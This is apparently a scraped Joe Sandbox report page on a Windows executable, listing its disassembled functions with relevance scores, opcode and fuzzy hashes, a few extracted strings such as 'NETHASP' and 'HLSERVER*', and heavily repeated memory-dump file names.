Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID: &$D
API String ID: 0-1138263919
Opcode ID: 16946f61db68bcfa531c36d6d805463b69b88be8b43f4469fbf2aaa6f77174ea
Instruction ID: e966281431bde8f5ced9cdf8469f613dde040be4f3ae541fddc8c2c659d61bd9
Opcode Fuzzy Hash: 16946f61db68bcfa531c36d6d805463b69b88be8b43f4469fbf2aaa6f77174ea
Instruction Fuzzy Hash: ECC11476A107454BE744CF39CC806AAB7D2EFC4305F148A3AE911C3396EB78D649C7A9

Function 0044DAC0 Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

@, xrefs: 0044DB84

Memory Dump Source

Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 5d0147e1b8e4f5d6d3a745a26ed7d802266730a9675a78caf94c80bb1a58acd4
Instruction ID: 80d21c34bb6ae7158faf62bcd033f9d34088e83b4646355621e00821d873ed2c
Opcode Fuzzy Hash: 5d0147e1b8e4f5d6d3a745a26ed7d802266730a9675a78caf94c80bb1a58acd4
Instruction Fuzzy Hash: 2C315972A007094BE724DE299C4956BB3E4DFC0305F044A3FF952C3342EA38EA49C7A9

Function 00442970 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

NETHASP_00112233445566zz, xrefs: 00442A77

Memory Dump Source

Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID: NETHASP_00112233445566zz
API String ID: 0-526728173
Opcode ID: d600ed2a37e33558740473f6b209a886bd2979a05da70e6f98333cf0bf7521f6
Instruction ID: c01a8595a570e52076e6c81c97361f43471d4346ebe204a663ac6df0e50c8e0d
Opcode Fuzzy Hash: d600ed2a37e33558740473f6b209a886bd2979a05da70e6f98333cf0bf7521f6
Instruction Fuzzy Hash: 2731F70E9593C24DE325DB7888107FBAFE29FE6210F5D49BE98D98B783C4294046D3B1

Function 00452810 Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd94b818cdc8712dc955d815b6b14d439c12b0c554483b827a4191f1f18468a8
Instruction ID: 5621dbd42eb087a3efff43b148d242805c835e3021cf1da33a348ce65f153428
Opcode Fuzzy Hash: bd94b818cdc8712dc955d815b6b14d439c12b0c554483b827a4191f1f18468a8
Instruction Fuzzy Hash: 8E020B7690878A8FD714DF1CC84162AB7E1BFC8304F4A096CEA909B356DB78F915CB85

Function 004522C0 Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89d31817f79e43d1fcc6de6552c2b922a3367e755c2ee81730d96a6ef8bda629
Instruction ID: 53ccb12187c115fc644893fb2bd5b782b7f6e5df37e2e0993c5105b0d6249dbf
Opcode Fuzzy Hash: 89d31817f79e43d1fcc6de6552c2b922a3367e755c2ee81730d96a6ef8bda629
Instruction Fuzzy Hash: 19020B7690878A8FD714DF1CC84162AB7E1BFC8304F4A096CEA909B356DB78F915CB85

Function 0040431D Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa0581a7e887880e07d6ed4b153e311fd59c7b35d25d5a62e0b506935308d7da
Instruction ID: 6d36cd6d847ac50dff605874ce029c1b3f790dd0e664c9ca5f43211dfae37df0
Opcode Fuzzy Hash: fa0581a7e887880e07d6ed4b153e311fd59c7b35d25d5a62e0b506935308d7da
Instruction Fuzzy Hash: 2971579698E3C05FD71347B058696917FB0AE23124B5F92DBC8C6CF8A3E54D484AC323

Function 00441360 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfb336ec09bbebb29675f50539243b0cc2fdd3e4537de5a9ff245748efdf1395
Instruction ID: 9aa426ad075d82161b80894cc8baeffa32b3dde6747d47502b9ba796aab667d1
Opcode Fuzzy Hash: dfb336ec09bbebb29675f50539243b0cc2fdd3e4537de5a9ff245748efdf1395
Instruction Fuzzy Hash: 4F51F3756092814BE720DE39D841AEBBBD6DFD9314F09897AE9C8C3302D029D85D87A6

Function 004492E0 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85ce41991173dbadcfdea74fd3bd294495b0c6485591fe382654d4bfbba070e6
Instruction ID: 21d6890e665c97951741c4f196da70ae8bd21b77b76669c31e00aa3f47cb015d
Opcode Fuzzy Hash: 85ce41991173dbadcfdea74fd3bd294495b0c6485591fe382654d4bfbba070e6
Instruction Fuzzy Hash: 07619E719083019FD714DF24D881B6BBBE0FB89319F44482EF88997352D339EA49CB96

Function 0044DC20 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a682b18139214241742368ae0951ac6ff74cfb4a1e3dddf2ab81183e74a6f54c
Instruction ID: e760f3c057393c1c42fa8d829563a35c3de7d9169446fb1d9e2c12d635d1a7f5
Opcode Fuzzy Hash: a682b18139214241742368ae0951ac6ff74cfb4a1e3dddf2ab81183e74a6f54c
Instruction Fuzzy Hash: 7C417BB2A01B454BF318CB2CCC8976BB792DBC4305F148B2ED512D7786DA78A505C3A8

Function 00442030 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f23e764a258e746145005bb8f228fc192aa5f362aa6b61e6851fcbfe09853e0d
Instruction ID: 53e8721af9d2935ff255f281c9490100fd106ccb408c2b8e94a8cc1d056f0990
Opcode Fuzzy Hash: f23e764a258e746145005bb8f228fc192aa5f362aa6b61e6851fcbfe09853e0d
Instruction Fuzzy Hash: 7AF0F69BA0161F5FC310EE68B8801E3B3DBE7B67A0B1A1461E740C7321E1A11809E254

Function 004035A2 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d74de621471113eeeb8add9240d3a41931af28086330595ed0f5070e02ead39
Instruction ID: 3fed552dc0f16c94019d21b909574d6693bb4f651eae2b4a6156c6236d19073f
Opcode Fuzzy Hash: 1d74de621471113eeeb8add9240d3a41931af28086330595ed0f5070e02ead39
Instruction Fuzzy Hash:

Function 00447880 Relevance: 6.3, APIs: 4, Instructions: 316
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 701717f76f5fe287e7d309bb2a5ec2d4c4f1fcacca32e3f437aabca2e8024746
Instruction ID: db78036c0407077dc33b3c98e79fd2754e219730d596cdf3bd1da380166198d1
Opcode Fuzzy Hash: 701717f76f5fe287e7d309bb2a5ec2d4c4f1fcacca32e3f437aabca2e8024746
Instruction Fuzzy Hash: 9C912476B412045FFB24BB18FC86BEA7391E781B36F94113BDE0481290D77F914E86A6

Function 0044A2E0 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 316
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

HLSERVER*, xrefs: 0044A471

Memory Dump Source

Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID: HLSERVER*
API String ID: 0-957054744
Opcode ID: 09aabef86f9e71416445cf1ff0a91cc696f79f3c95a9a1e4baad9ba26417a56a
Instruction ID: 414a6989aa7181aa4c89ac1ab9b235a0e7efefaa3f73ce74a9a2122661ee6fb3
Opcode Fuzzy Hash: 09aabef86f9e71416445cf1ff0a91cc696f79f3c95a9a1e4baad9ba26417a56a
Instruction Fuzzy Hash: 4DC1C171984301ABF720DF20DD41B6BB3E4BB84708F14482EF9899B281E779D955CB9B

Function 00446D40 Relevance: 5.2, APIs: 4, Instructions: 173
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
